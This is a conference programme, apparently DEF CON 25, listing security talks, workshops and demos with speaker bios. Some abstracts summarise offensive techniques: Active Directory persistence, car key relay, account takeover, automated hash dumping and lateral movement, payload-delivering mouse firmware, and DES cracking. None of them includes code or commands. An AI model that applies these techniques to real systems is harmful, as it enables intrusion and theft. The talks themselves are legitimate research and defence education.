Saturday at 17:00 in 101 Track

45 minutes | Demo

Marina Simakov Security researcher, Microsoft

Igal Gofman Security researcher, Microsoft

Credentials have always served as a favorite target for advanced attackers, since they allow an attacker to traverse a network efficiently, without using any exploits.

Moreover, compromising the network might not be sufficient, as attackers strive to obtain persistency, which requires the use of advanced techniques to evade the security mechanisms installed along the way.

One of the challenges adversaries must face is: How to create threats that will continuously evade security mechanisms, and even if detected, ensure that control of the environment can be easily regained?

In this talk, we briefly discuss some of the past techniques for gaining persistency in a network (using local accounts, GPOs, skeleton key, etc.) and why they are insufficient nowadays.

This is followed by a comprehensive analysis of lesser-known mechanisms to achieve persistency, using non-mainstream methods (such as object manipulation, Kerberos delegation, etc.).

Finally, we show how defenders can secure their environment against such threats.

Marina Simakov
Marina Simakov is a security researcher at Microsoft, with a specific interest in network based attacks.

She holds an M.Sc in computer science, with several published articles. She gave a talk at BlueHat IL 2016 regarding attacks on local accounts.

@simakov_marina

Igal Gofman
Igal Gofman is a security researcher at Microsoft. Igal has a proven track record in network security, research-oriented development and threat intelligence.

His research interests include network security, intrusion detection and operating systems.

Before Microsoft, Igal was a Threat Response Team Lead at Check Point Software Technologies leading the development of the intrusion detection system.

@IgalGofman


Return to Index      -     

 

Demolabs - Table 6 - Sunday - 10:00-11:50


HI-Jack-2Factor

Weston Hecker

Sunday from 1000-1150 at Table Six

Audience: Offense, Defense, Hardware

There are several attacks being performed on PKES (passive key entry) systems on cars. Several high-profile talks this year are about stealing cars using 11-dollar SDRs and cheap devices to relay the signals from the key fob to the immobilizer. I will be demoing a device that I made using an Arduino, a 433/315 MHz radio and a 2.4 GHz wireless antenna. They cost about 12 dollars to make and basically add two-factor authentication to your vehicle.

https://eprint.iacr.org/2010/332.pdf This was the 2009 research. Here is the modern 2017 version https://www.wired.com/2017/04/just-pair-11-radio-gadgets-can-steal-car/

Weston Hecker



IOT - Main Contest Area - Friday - 13:00-13:50




DEFCON - Modena - Friday - 20:00-21:59


Horror stories of a translator and how a tweet can start a war with less than 140 characters

Friday at 20:00 - 22:00 in Modena

Evening Lounge

El Kentaro Hacker

Translators are invisible; when they are present, it is assumed that they know the language and are accurately translating between the languages. But how do you assure that the translator is accurately translating or working without an agenda? Although many of the case studies presented in this talk will focus on translating between different languages, the basic premise can be applied in any case where information needs to be shared among two or more different contexts (e.g. sales vs. engineering, government vs. private sector, etc.). The talk will showcase publicly known historical cases and personal experiences where translation errors (accidental and deliberate) have led to misunderstandings, some with dire consequences. The talk will also showcase the use of translators as an offensive tool (e.g. how to create more credible fake news). We as a society consume more information, and consume it faster, than before, so we have to be aware of the dangers that are inherent in bad translations. The infosec/cyber security profession, because of the potential for large-scale global impacts and/or the need to maintain operational security, also poses unique considerations when translating or using a translator. This talk will highlight the unique challenges of using a translator or translations in such environments.

El Kentaro
El Kentaro / That Guy in Tokyo.

El Kentaro has been a communications facilitator between Japan and the rest of the world in the information technology industry since 1996. For the last 7 years Kentaro has focused solely on providing interpretation services for the infosec/cyber security industry in Japan. Kentaro also provided the Japanese subtitles for the DEF CON documentary released in 2015 and is a member of the CODE BLUE Security Conference held annually in Japan.



VMHV - Roman 1, Promenade Level - Friday - 16:00-16:45


Title:
How did we get here: A history of voting technology, hanging chads, and the Help America Vote Act. This segment will feature a punch card machine and demo what can go wrong with it.

Matt Blaze bio
Matt Blaze, Cryptographer & Associate Professor of Computer & Information Science at University of Pennsylvania

Matt Blaze is a professor at the University of Pennsylvania, where he directs the Distributed Systems Lab and conducts research in security, privacy, surveillance, cryptography, scale, and the relationship between technology and public policy. His work has included the discovery of fundamental flaws in the Clipper chip and other surveillance systems, foundational work in network security, file encryption, trust management and two-way radio security, and security evaluations of major electronic voting systems in use in the US.


PHV - Milano VIII - Promenade Level - Friday - 10:10-10:59


How Hackers Changed The Security Industry

Chris Wysopal, CTO and Co-Founder of Veracode

Before hackers got involved in cybersecurity, the industry was focused on products and compliance. Security was security features: firewalls, authentication, encryption. Little thought was given to vulnerabilities that allowed the bypassing of those features. Hackers came along with the idea that you use offensive techniques to simulate how an attacker would discover vulnerabilities in a network, a system, or an application. Offensive skills have been on the rise ever since, and now the best way to secure something is to try and break it yourself before the attacker does. This history will be told by a member of the hacker group The L0pht who lived the arc from the underground, to consumer advocates, to speaking at the U.S. Senate, to forming a 200-employee security consultancy, to schooling Microsoft and changing how people build software. Attendees will learn why we need the kind of tools hackers build to secure our systems and why we need people who are taught to think like hackers, 'security champions', to be part of software development teams.

Chris Wysopal (Twitter: @WeldPond) Chris Wysopal is currently Veracode's CTO and co-founder. He is one of the original vulnerability researchers and an early member of L0pht Heavy Industries, which he joined in 1992. He is the author of netcat for Windows and one of the authors of L0phtCrack. He has testified on Capitol Hill in the US on the subjects of government computer security and how vulnerabilities are discovered in software. He published his first advisory in 1996 on parameter tampering in Lotus Domino and has been trying to help people not repeat this type of mistake for 15 years. He is also the author of "The Art of Software Security Testing" published by Addison-Wesley.



ICS - Calibria - Friday - 15:30-15:59


Title: How to create dark buildings with light speed.

A number of talks in the last few years have addressed various topics in the generic area of industrial control system insecurity, but only a few have tapped into the security of building automation systems, despite their prevalence.

The usage of building automation, whether in private homes or corporate buildings, aims to optimize comfort, energy efficiency and physical access for its users. Is cyber security part of the equation? Unfortunately, not to the extent one might expect: cyber security is quite often found to be sacrificed either for comfort or for efficiency.

The growing number of small and large-scale installations, in combination with easily exploitable vulnerabilities, leads to a stronger exposure of building automation systems, which are often overlooked. Even worse, an adversary who understands how regular building automation protocol functions can be used for malicious purposes may not only create chaos within the breached building but can potentially even peek into internal networks over building protocols that are otherwise not reachable.

This talk describes prototypic attack scenarios through building automation systems one should consider, and how, even without exploits, a number of protocol functions in common building automation protocols like BACnet/IP and KNXnet/IP can support a malicious adversary going for those scenarios.

For penetration testers who would like to explore this interesting field of industrial security research, we include a section on tooling. We will discuss noteworthy tools both from the security toolbox and from the building automation toolbox for carrying out a number of attacks or their preparatory steps.

We will close the talk by discussing existing security measures proposed by the building automation industry as well as the adoption problems found in this field.


Bio: Thomas Brandstetter

Thomas Brandstetter is CEO and Co-Founder of Limes Security, a company specializing in industrial cyber security and secure software development, based in Austria. Besides his work as a CEO, he is an Associate Professor at the University of Applied Sciences St. Poelten, Austria, where he loves to teach his students classes like industrial cyber security, incident response, botnets and honeypots, and penetration testing. He gathered a decade of experience in the industry when he joined Siemens 10 years ago in order to establish the topic of cyber security in industrial products. After spending years pen-testing products, he became Program Manager of the "Hack-Proof-Products Program" that he had co-founded. He held this position until 2010, when the Stuxnet malware hit. He was assigned the official incident manager role for this unique threat and still loves to look back on what he learned back then, both technically and about organizations. Out of the remnants of the Stuxnet activities, Thomas founded the Siemens ProductCERT, which is still one of the most effective industrial incident and vulnerability response teams worldwide today. He led the Siemens ProductCERT for another two years before he left for Limes Security and UAS St. Poelten. He is a CISSP and GICSP and holds a degree in IT security from the University of Applied Sciences Hagenberg, Austria, and a master's degree in Business Administration from the Universities of Augsburg and Pittsburgh.





RCV - Palermo room, Promenade level - Saturday - 14:50-15:15


How to obtain 100 Facebook accounts per day through internet searches

Abstract

Back in 2016, the way the Facebook mobile application implemented content through "Instant Articles" was very new. A user can view content from third parties directly in the Facebook platform without needing to open the browser, for instance. This content can also be shared, saved, opened in the browser and so on.

In this talk, we will share how these Instant Articles, and the way they were shared, led us to the possibility of accessing Facebook accounts, and how, through internet searches, this became a huge problem! We'll discuss how we identified the issue and how it was tested, reported, fixed and rewarded, and we also talk about a new attack vector for further research.

Speaker Profile

Guillermo (@bym0m0) is a Cyber Security Penetration Testing Consultant at Deloitte Mexico; he has worked for many Financial Institutions and Public sector for the last 5 years.

Yael (@zkvL7) is a Cyber Security Snr. Consultant at Deloitte Mexico and has been working as a Security Specialist in different organizations for the last 4 years. He is really into programming, and his laziness has led to writing some code to automate certain things at work; nmap and nessus reports, for instance (https://github.com/zkvL7), and some other work not ready to see the light.



SEV - Emperors BR II - Saturday - 18:25-19:15



Saturday July 29 6:25PM 50 mins
How to protect your banks & enterprises (Talk given by someone who robs banks & enterprises)
Most people who work on the defensive side of computer security only see the landscape from that perspective! In this talk Jayson will show how an attacker views your website & employees, then uses them against you. We'll start with how a successful spear phish is created, using the information gathered from the company's own 'about' page as well as scouring social media sites for useful information to exploit employees. The majority of the talk will cover successful counter-measures to help stave off or detect attacks. This discussion will draw on the speaker's 15 years' experience of working in the US banking industry on the side of defense. At the same time he'll be drawing on over 6 years of doing engagements where he took on the role of the attacker. If everything turns out well, everyone will have learned something new that they can immediately take back to their networks to better prepare them against attacks!

Jayson Street: @jaysonstreet
Jayson E. Street is an author of the "Dissecting the hack" series. He is also the DEF CON Groups Global Coordinator. He has also spoken at DEF CON, DerbyCon, UCON and at several other 'CONs and colleges on a variety of Information Security subjects. His life story can be found on Google under "Jayson E. Street". *He is a highly carbonated speaker who has partaken of Pizza from Beijing to Brazil. He does not expect anybody to still be reading this far, but if they are, please note he was chosen as one of Time's persons of the year for 2006.



BHV - Pisa Room - Sunday - 12:00-12:59


Title: How to use the Scientific Method in Security Research

Speaker: Jay Radcliffe

About Jay:
Jay Radcliffe has been working in the computer security field for over 20 years. Coming from the managed security services industry, Jay has used just about every security device made over the last decade. Recently, Jay presented ground-breaking research on security vulnerabilities in medical devices, and was featured on national television as an expert on medical device vulnerability. Jay also has experience with hardware hacking and radio technology. Jay holds a Master's degree in Information Security Engineering from SANS Technology Institute, as well as a Bachelor's degree in Criminal Justice/Pre-Law from Wayne State University. SC Magazine named him one of the Top Influential IT Security Thinkers in 2013.

One of the huge criticisms of security research is the lack of process and adherence to traditional research methods. Quite often our "research" is just tearing apart systems and exposing their vulnerabilities. While this is useful, there is a better way. This talk will walk through the process of how I used the scientific method to conduct the research that led to my 2011 insulin pump findings. By changing just a couple of steps in our research, I think that we can bring more outside credibility to our hard and important work.




DEFCON - Track 4 - Friday - 14:00-14:45


How we created the first SHA-1 collision and what it means for hash security

Friday at 14:00 in Track 4

45 minutes | Demo, Tool

Elie Bursztein Anti-abuse research lead, Google

In February 2017, we announced the first SHA-1 collision. This collision combined with a clever use of the PDF format allows attackers to forge PDF pairs that have identical SHA-1 hashes and yet display different content. This attack is the result of over two years of intense research. It took 6500 CPU years and 110 GPU years of computations which is still 100,000 times faster than a brute-force attack.

In this talk, we recount how we found the first SHA-1 collision. We delve into the challenges we faced from developing a meaningful payload, to scaling the computation to that massive scale, to solving unexpected cryptanalytic challenges that occurred during this endeavor.

We discuss the aftermath of the release, including the positive changes it brought and its unforeseen consequences. For example, it was discovered that SVN is vulnerable to SHA-1 collision attacks only after the WebKit SVN repository was brought down by the commit of a unit test aimed at verifying that WebKit is immune to collision attacks.

Building on the GitHub and Gmail examples, we explain how to use counter-cryptanalysis to mitigate the risk of collision attacks against software that has yet to move away from SHA-1. Finally, we look at the next generation of hash functions and what the future of hash security holds.

Elie Bursztein
Elie Bursztein leads Google's anti-abuse research, which helps protect users against Internet threats. Elie has contributed to applied-cryptography, machine learning for security, malware understanding, and web security; authoring over fifty research papers in the field. Most recently he was involved in finding the first SHA-1 collision.

Elie is a beret aficionado, tweets at @elie, and performs magic tricks in his spare time. Born in Paris, he received a Ph.D. from ENS Cachan in 2008 before working at Stanford University and ultimately joining Google in 2011. He now lives with his wife in Mountain View, California.

@elie



BHV - Pisa Room - Sunday - 13:00-13:29


Title: How your doctor might be trying to kill you and how personal genomics can save your life

Speaker: dlaw and razzies

About Jennifer Szkatulski:
Jennifer has been an information security professional for the past 20 years and is currently a Security Intelligence Analyst. Her experience includes reverse engineering malware, penetration testing, vulnerability analysis, and incident response. Jennifer studied biology and psychology and focused her studies on neurology. Her passion for brain science, coupled with computer science, has been a driving factor in her interest in the technological singularity and human/machine integration. In her free time she runs a robotics club for kids and is learning to play the ukulele. She is an avid fan of the Detroit Tigers, William Shakespeare, and the oxford comma.

About Darren Lawless:
Darren Lawless is a security analyst with 14+ years of plugging dikes and playing sentry. He currently leads the threat monitoring team for a large security services organization. His interest in all things *bio* has blossomed and intensified over the last couple of years, resulting in forays, experimentation, and investigation into nootropics, biofeedback, augmentation, implantation, brain stimulation, and sundry wet-tech bad-assedness.

“Genomics saved my life.” – Jen
“My father can rot in hell.” - Darren

How is personalized medicine important? Should I get a genomic test? Is the Illuminati collecting my data? What can I learn from genetic testing? What are the risks? How do I choose a test? Will my doctor hate me if I get a genetic test?
These questions won’t be answered in thirty minutes, but we offer grist for the discussion mill.
We will present two personal stories on how genomics can have a real effect on your medical treatment, your understanding of who you are, and how you live your life.




Demolabs - Table 2 - Saturday - 12:00-13:50


https://crack.sh/

David Hulton

Ian Foster

Saturday from 1200-1350 at Table Two

Audience: Offense, Mobile, Hardware

Cracking DES has been doable for state actors for the past few decades, but most people don't have access to a supercomputer or $100k of dedicated hardware lying around. In 2012, Moxie Marlinspike and David Hulton released a service on Cloudcracker.com to provide this to the masses for 100% success rate cracking of MSCHAPv2 (PPTP VPNs & WPA-Enterprise). Since then Cloudcracker.com has vanished, but ToorCon has taken over and released https://crack.sh, with added features for cracking MSCHAPv1 (Windows Lanman/NTLMv1 login), Kerberos Authentication, and a general purpose interface for cracking other systems that still use DES. We will also be releasing a free real-time service for cracking DES (in ~3 seconds) with chosen plaintext, providing a full break of Windows Lanman/NTLMv1 authentication and allowing people to test their devices to see if they're doing proper WPA-Enterprise certificate checking.

https://crack.sh/

David Hulton
David Hulton organizes the ToorCon suite of conferences and has spent nearly 20 years doing security research mostly focused on reverse engineering and cracking crypto. He's mostly known for developing the bsd-airtools wireless attack tools in the early 2000's, developing and presenting the first practical attack on GSM a5/1 in 2008, and releasing a DES cracking service and tools to perform a full break of MSCHAPv2 authentication in 2012.

Ian Foster



Night Life - Octavius 1&2 - Saturday - 22:00-26:00


Title:
Human Zoo

Spent the first part of the night in the room next door enjoying Whose Slide is it Anyway? Well, this is the after party for folks that want to keep the insanity going. Join us, and come be part of the Human Zoo!

BHV - Pisa Room - Friday - 17:30-17:59


Title: Human-Human Interface

Speakers: Charles Tritt

About Charles:
Dr. Charles Tritt has been a professor of biomedical engineering for over 25 years. His academic credentials include a Ph.D. in chemical engineering and an M.S. in biomedical engineering. His teaching has ranged from introductory cell biology and genetics to biomedical mechatronics. Over the past several years, he has become interested in exploring the potential of hobbyist-grade equipment as a vehicle for low-cost and accessible medical devices and the corresponding ethical and legal implications.

Abstract:
In this demonstration, readily available and inexpensive (about $100 total cost) equipment will be used to relay conscious motor activity from one human subject to another. Specifically, transcutaneous electrodes and a bio-amplifier will be used to produce an electromyogram (EMG) signal from the lower arm of the controlling subject. This signal will be digitized and processed using an embedded microcontroller evaluation board (an Arduino UNO could also be used) which in turn will activate a relay to apply transcutaneous electrical nerve stimulation to the ulnar nerve of the controlled subject. Motions of the controlled subject’s fingers will involuntarily replicate those of the controlling subject.




SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 10:00-10:59


Title:
HUMSEC (or how I learned to hate my phone)

1000 Sunday
amarok
@0x00amarok

I used to blog random security stuff, but now am talking directly to people at InfoSec cons instead. So like a crappy Richard Thieme talk, but maybe with a bit more tech and a few less aliens (but maybe some f*cking aliens). This time around, we're talking "Human Security" (no idea, srsly)


PHV - Milano VIII - Promenade Level - Saturday - 17:10-17:30


Hunting Down the Domain Admin and Rob Your Network

Keith Lee, Senior Security Consultant at Trustwave SpiderLabs
Michael Gianarakis, Director of Trustwave SpiderLabs Asia-Pacific

Portia is a new tool we have written at SpiderLabs to aid in internal penetration testing engagements. The tool allows you to supply a username and password that you have captured and cracked from Responder or other sources, as well as an IP range, subnet or list of IP addresses. The tool finds its way around the network and attempts to gain access to the hosts, finds and dumps the passwords/hashes, and reuses them to compromise other hosts in the network. In short, the tool helps with lateral movement in the network and automating privilege escalation, as well as finding sensitive data residing on the hosts.

Keith Lee (Twitter: @keith55) is a Senior Security Consultant with Trustwave's SpiderLabs Asia-Pacific. SpiderLabs is one of the world's largest specialist security teams, with over 100 consultants spread across North America, South America, Europe and the Asia Pacific. Keith Lee has presented at Hack In The Box, BlackHat Arsenal and PHDays.

Michael Gianarakis is the Director of Trustwave SpiderLabs' Asia-Pacific practice, where he oversees the delivery of technical security services in the region. Michael has presented at various industry events and meetups including Black Hat Asia, Thotcon, Rootcon, and Hack in the Box. Michael is also actively involved in the local security community in Australia, where he is one of the organizers of the monthly SecTalks meetup.



DEFCON - Track 2 - Sunday - 10:00-10:30


I Know What You Are by the Smell of Your Wifi

Sunday at 10:00 in Track 2

20 minutes | Art of Defense, Demo, Tool, Audience Participation,

Denton Gentry Software Engineer

Existing fingerprinting mechanisms to identify client devices on a network tend to be coarse in their identification. For example, they can tell it is an iPhone of some kind, or that it is a Samsung Android device of some model. They might look at DHCP information to know its OS, see if the client responds to SSDP, or check DNS-SD TXT responses.

By examining Wi-Fi Management frames we can identify the device much more specifically. We can tell an iPhone 5S from an iPhone 5, a Samsung Galaxy S8 from an S7, an LG G5 from a G4. This talk describes how the signature mechanism works.

Specifically identifying the client is the first step toward further scanning or analysis of that client's behavior on the network.

Denton Gentry
Denton Gentry is a software engineer who has worked at a lot of places and plans to work at a few more.



ICS - ICS-Village - Saturday - 14:30-15:59


ICS SCADA Forensics workshop/challenge - Joe Stirland and Kevin Jones
Title: ICS SCADA Forensics workshop/challenge

The ICS PCAP challenge is designed to utilise network forensics skills to analyse a baseline and an attack network pcap taken from an ICS network, in order to identify why a PLC has ceased working. The timescale for analysis is limited, as we need to replace the PLC within an hour max, and we have to be certain that the attack has been identified correctly in order to prevent future similar attack methods. The analysis will take 1 hour, and a brief description of findings and conclusions is to be presented at the end. The participants will require network analysis tools such as Wireshark, tcpdump, TShark, grep, etc.; a copy of Kali Linux provides all of these tools.


Bio: Joe Stirland and Kevin Jones

No BIO available



DEFCON - Track 3 - Saturday - 11:00-11:45


If You Give a Mouse a Microchip... It will execute a payload and cheat at your high-stakes video game tournament

Saturday at 11:00 in Track 3

45 minutes | Demo

skud (Mark Williams) Embedded Software Engineer

Sky (Rob Stanley) Security Software Engineer, Lead

The International, a recent esports tournament, had a 20 million dollar prize pool with over five million people tuned in to the final match. The high-stakes environment at tournaments creates an incentive for players to cheat for a competitive advantage. Cheaters are always finding new ways to modify software, from attempting to sneak executables in on flash drives, to using cheats stored in Steam's online workshop, which bypass IP restrictions.

This presentation describes how one can circumvent existing security controls to sneak a payload (game cheat) onto a target computer. Esports tournaments typically allow players to provide their own mouse and keyboard, as these players prefer to use specific devices or may be obligated to use a sponsor branded device. These "simple" USB input devices can still be used to execute complex commands on a computer via the USB Human Interface Device (HID) protocol.

Our attack vector is a mouse with an ARM Cortex M series processor. The microcontroller stores custom user profiles in flash memory, allowing the mouse to retain user settings between multiple computers. We modify the device's firmware to execute a payload delivery program, stored in free space in flash memory, before returning the mouse to its original functionality. Retaining original functionality allows the mouse to be used discreetly, as it is an "expected" device at these tournaments. This concept applies to any USB device that uses this processor, and does not require obvious physical modifications.

This delivery method has tradeoffs. Our exploit is observable, as windows are created and in focus during payload delivery. The advantage to this approach is that it bypasses other security measures that are commonly in place, such as filtered internet traffic and disabled USB mass storage.

skud (Mark Williams)
Mark Williams is an embedded software engineer with experience in robotics and computer vision. His interest in embedded systems security and research builds off of a love for DIY projects, microcontrollers, and breaking things.

@skudmunky

Sky (Rob Stanley)
Rob Stanley is a lead security software engineer with a background in reverse engineering. He enjoys working with low-level software, taking things apart and putting them back together, and malware analysis. Lately, he has turned his passion towards sharing his knowledge by teaching, and authoring CTF challenge problems.



IOT - Main Contest Area - Saturday - 14:40-15:30




BHV - Pisa Room - Friday - 13:30-13:59


Title: Implants: Show and Tell

Speaker: c00p3r

About c00p3r:
c00p3r is the founder of dangerousminds.io, a biohacking, grinding, implantable tech, and network security podcast that started in late September 2016; a sysadmin who lives open source solutions by trade; and also PR director and member of the board of directors for Prophase Biostudios, located in Austin, Texas.

Abstract:
Through sharing experiences learned first hand and through work on the Dangerous Minds Podcast, c00p3r will be introducing you to implantable technology, explaining the basic products that are available on the market now, from where, as well as provide a show and tell experience of what it is like to become one of the augmentives. Come to learn, and stay to laugh and become a part of this new world of cyborgs.




ICS - Octavius 6 - Friday - 14:30-18:30


Title: Industrial Control System Security 101 and 201 - SOLD OUT

This 4-hour session is designed to arm incident response teams and security researchers with vital skills needed to monitor, analyze and respond to attacks against the unique networks that make up the backbone of the world's critical infrastructure. With recent attacks on critical infrastructure demonstrating the real and present danger to ICS networks, it is more important than ever to hone these skills and reduce the blind spots that exist for security teams. Understanding the inner workings of these networks, their unique protocols and the methods adversaries will employ to disrupt (including using legitimate commands to ICS network components) is of paramount importance as we witness an increasingly active threat landscape unfolding.

The workshop is composed of two, 2-hour sessions of ICS Fundamentals 101 and ICS Advanced 201. The two sessions step both the novice and intermediate skilled participant through the risks and mitigations of critical infrastructure and control system security.

The participant will use open source and trial editions of RexDraw, PeakHMI, NRL Core, Kali Linux, Python and Raspberry PIs.

The instructors will also perform demonstrations using real industrial devices. Participants will learn the ICS fundamentals and the value of technical, operational and physical security controls within ICS environments.

ICS 101 will guide the participants through the elements of ICS technical components (hardware, software, logic and protocols) by reverse engineering a bottling facility and a traffic light. The participants will learn about physical I/O, functional logic, industrial protocols and user interface design using the philosophy of build, break and secure. The participants will reverse a pre-built HMI user interface, OPC tag server and functional logic; break using industrial protocol overrides, MitM modifications and logic manipulations; and secure using social, communication, application/OS, firmware and hardware controls.

ICS 201 will teach students how to understand the content of network packet captures across a wide variety of proprietary ICS protocols. Using this understanding, we will explore in-depth the attacks and defenses demonstrated in ICS 101 to associate the value of active defense.

Participants will learn how to utilize Wireshark to perform deep packet analysis on multiple PCAPs ranging from simple to complex. Students will be taught the fundamental skills necessary for performing blind protocol analysis on proprietary ICS protocols, and learn how to create custom rules for specific addresses within the packets as well as ICS vendor-specific commands. This analysis will give insight into the attacks performed, the elements manipulated and valuable tools available to actively defend the environment. Participants will gain an in-depth understanding of industrial protocols and their complexity as well as a detailed explanation of the "behind the scenes" of ICS operations. When leaving this workshop, participants will be able to capture and analyse industrial communication flows originating from different network segments using open source tooling (e.g. Snort, Wireshark, etc.), and to identify potential anomalous network traffic.

Prerequisites: Experience with Linux and Windows operating system administration. Experience with TCP/IP networking. Experience with Kali Linux.

Materials: A laptop with at least one USB port, 40 GB of unused hard disk space, a minimum of an Intel i3 processor, and the most recent VMware Player or equivalent VMware product. Local administrator rights on the laptop and the ability to turn off anti-virus software.


Bio: Matthew E. Luallen

Matthew Luallen is the Executive Inventor at CYBATI, a cybersecurity education company. Mr. Luallen has provided hands-on cybersecurity consulting and education within critical infrastructure for over 20 years. During this time he has owned and sold 3 companies, developed and taught on cybersecurity products and technical assessment methodologies, and maintained CISSP and CCIE status for 16 years. Mr. Luallen's passion is education and expanding knowledge through building, breaking, securing and making.


Bio: Nadav Erez

Nadav Erez is a Senior Researcher at Claroty's Research team, leading OT protocol analysis, reverse engineering and blind protocol reconstruction. Prior to joining Claroty, Nadav served in an elite cyber unit in the Israel Defense Forces (IDF) Intelligence corps, where he led a team of cybersecurity researchers in various operations.


Workshops - ( Sold Out ) - Octavius 6 - Friday - 14:30-18:30


Industrial Control System Security 101 and 201

Friday, 14:30 to 18:30 in Octavius 6

Matthew E. Luallen Executive Inventor, CYBATI

Nadav Erez Senior Researcher, Claroty's Research team

This 4-hour session is designed to arm incident response teams and security researchers with vital skills needed to monitor, analyze and respond to attacks against the unique networks that make up the backbone of the world's critical infrastructure. With recent attacks on critical infrastructure demonstrating the real and present danger to ICS networks, it is more important than ever to hone these skills and reduce the blind spots that exist for security teams. Understanding the inner workings of these networks, their unique protocols and the methods adversaries will employ to disrupt (including using legitimate commands to ICS network components) is of paramount importance as we witness an increasingly active threat landscape unfolding.

The workshop is composed of two 2-hour sessions, ICS Fundamentals 101 and ICS Advanced 201. The two sessions step both the novice and the intermediate-skilled participant through the risks and mitigations of critical infrastructure and control system security.

The participant will use open source and trial editions of RexDraw, PeakHMI, NRL CORE, Kali Linux, Python and Raspberry Pis.

The instructors will also perform demonstrations using real industrial devices. Participants will learn the ICS fundamentals and the value of technical, operational and physical security controls within ICS environments.

ICS 101 will guide the participants through the elements of ICS technical components (hardware, software, logic and protocols) by reverse engineering a bottling facility and a traffic light. The participants will learn about physical I/O, functional logic, industrial protocols and user interface design using the philosophy of build, break and secure. The participants will reverse a pre-built HMI user interface, OPC tag server and functional logic; break using industrial protocol overrides, MitM modifications and logic manipulations; and secure using social, communication, application/OS, firmware and hardware controls.

ICS 201 will teach students how to understand the content of network packet captures across a wide variety of proprietary ICS protocols. Using this understanding, we will explore in-depth the attacks and defenses demonstrated in ICS 101 to associate the value of active defense.

Participants will learn how to use Wireshark to perform deep packet analysis on multiple PCAPs ranging from simple to complex. Students will be taught the fundamental skills necessary for performing blind protocol analysis on proprietary ICS protocols, and learn how to create custom rules for specific addresses within the packets as well as ICS vendor-specific commands. This analysis will give insight into the attacks performed, the elements manipulated and the valuable tools available to actively defend the environment. Participants will gain an in-depth understanding of industrial protocols and their complexity as well as a detailed explanation of what goes on "behind the scenes" of ICS operations. When leaving this workshop, participants will be able to capture and analyse industrial communication flows originating from different network segments using open source tooling (e.g. Snort, Wireshark), and to identify potentially anomalous network traffic.

Prerequisites: Experience with Linux and Windows operating system administration. Experience with TCP/IP networking. Experience with Kali Linux.

Materials: A laptop with at least one USB port, 40 GB of unused hard disk space, a minimum of an Intel i3 processor, and the most recent VMware Player or equivalent VMware product. Local administrator rights on the laptop and the ability to turn off anti-virus software.

Max students: 36 | Registration: https://dc25_luallen.eventbrite.com (Sold out!)

Matthew E. Luallen
Matthew Luallen is the Executive Inventor at CYBATI, a cybersecurity education company. Mr. Luallen has provided hands-on cybersecurity consulting and education within critical infrastructure for over 20 years. During this time he has owned and sold 3 companies, developed and taught on cybersecurity products and technical assessment methodologies, and maintained CISSP and CCIE status for 16 years. Mr. Luallen's passion is education and expanding knowledge through building, breaking, securing and making.

Nadav Erez
Nadav Erez is a Senior Researcher at Claroty's Research team, leading OT protocol analysis, reverse engineering and blind protocol reconstruction. Prior to joining Claroty, Nadav served in an elite cyber unit in the Israel Defense Forces (IDF) Intelligence corps, where he led a team of cybersecurity researchers in various operations.



Night Life - Turin, Promenade Level - Friday - 22:00-27:00


Title:
INFOSEC UNLOCKED

INFOSEC UNLOCKED will be hosting a safe and fun board game party for DEF CON attendees. We will provide the space, light refreshments and networking opportunities; all we need is you! Come learn about what it takes to become a conference speaker; no experience required and ALL are welcome! More details at https://isunlocked.com/dc25party ! InfoSec Unlocked is all about diversity and inclusion in Information Security. If you're part of an underrepresented group, or want to help out those who are underrepresented within our field, join us for good times, and good discussions, at InfoSec Unlocked.

CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 13:00-13:59


Insecure By Law

No description available



DEFCON - Track 1 - Thursday - 15:00-15:45


Inside the "Meet Desai" Attack: Defending Distributed Targets from Distributed Attacks

Thursday at 15:00 in 101 Track

45 minutes | Art of Defense

CINCVolFLT (Trey Forgety) Director of Government Affairs & IT Ninja, NENA: The 9-1-1 Association

In October of 2016, a teenage hacker triggered DTDoS attacks against 9-1-1 centers across the United States with five lines of code and a tweet. This talk provides an in-depth look at the attack, and reviews and critiques the latest academic works on TDoS attacks directed at 9-1-1 systems. It then discusses potential mitigation strategies for legacy TDM and future all-IP access networks, as well as disaggregated "over-the-top" originating services and the devices on which both the access network providers and originating service providers rely.

CINCVolFLT (Trey Forgety)
CINCVolFLT (Trey Forgety) is Director of Government Affairs for NENA: The 9-1-1 Association. He previously served as a Presidential Management Fellow in the U.S. Department of Homeland Security's Office of Emergency Communications, with rotations in the Federal Communications Commission's Public Safety and Homeland Security Bureau, and the U.S. Department of Commerce's National Telecommunications and Information Administration. A sometimes-piratical sailor and inveterate tinkerer, CINCVolFLT's recent activities have included promoting the use of new location technologies in wireless carriers' networks, and serving as pro bono counsel to QueerCon. He holds a B.S. in Applied Physics and a J.D., both from the University of Tennessee (GO VOLS!).

@cincvolflt



IOT - Main Contest Area - Friday - 10:00-10:50




IOT - Main Contest Area - Sunday - 10:00-10:50




RCV - Palermo room, Promenade level - Friday - 15:40-16:25


Into the Bird’s Nest: A Comprehensive Look at Twitter as a Research Tool

Abstract

With 313 million active users and approximately 500 million Tweets sent per day, Twitter has plenty of low-hanging fruit ripe for OSINT picking. Learn from an experienced information professional how to craft advanced searches to retrieve data from this popular social media platform. Understand the search commands that Twitter uses, tips and techniques for extracting data, examine some of the lesser-known features of Twitter, and get a glimpse of some of the resources that work in conjunction with Twitter to help you better organize all the information you will retrieve.

While you may know how to write scripts and scrape data from Twitter, this session will focus on the GUI which can retrieve much older data. This session is not how to Tweet better, get more likes, or even how to get verified. This is all about searching for and extracting information from Twitter and its associated sites. You will come away from this session with a better understanding of how to use Twitter as a research tool.

Speaker Profile

Tracy Z. Maleeff (@InfoSecSherpa) left behind the glamorous world of law firm librarianship to seek out the white-hot spotlight of the information security industry. She is a newly-minted Cyber Analyst at GSK (GlaxoSmithKline). Before that, Tracy started an independent research consulting business in 2016 called Sherpa Intelligence, and provided competitive intelligence, news monitoring, and social media management services. She earned a Master of Library and Information Science degree from the University of Pittsburgh.

Tracy was recognized with the Wolters Kluwer Law & Business Innovations in Law Librarianship Award in 2016 and the Dow Jones Innovate Award in 2014. Tracy is your guide up a mountain of information! Her Digital Portfolio can be viewed online here: https://sherpaintel.wordpress.com/portfolio/



RCV - Palermo room, Promenade level - Saturday - 16:00-17:59


Intro to OSINT: Zero on the way to Hero

Abstract

OSINT can be one's worst enemy or best friend, depending on what angle the person is looking at it from. This introduction-level workshop will start out discussing the basis of OSINT, then transition into applicable use case scenarios. Once we have a sound foundation in OSINT, we'll start to work on some collection considerations and techniques.

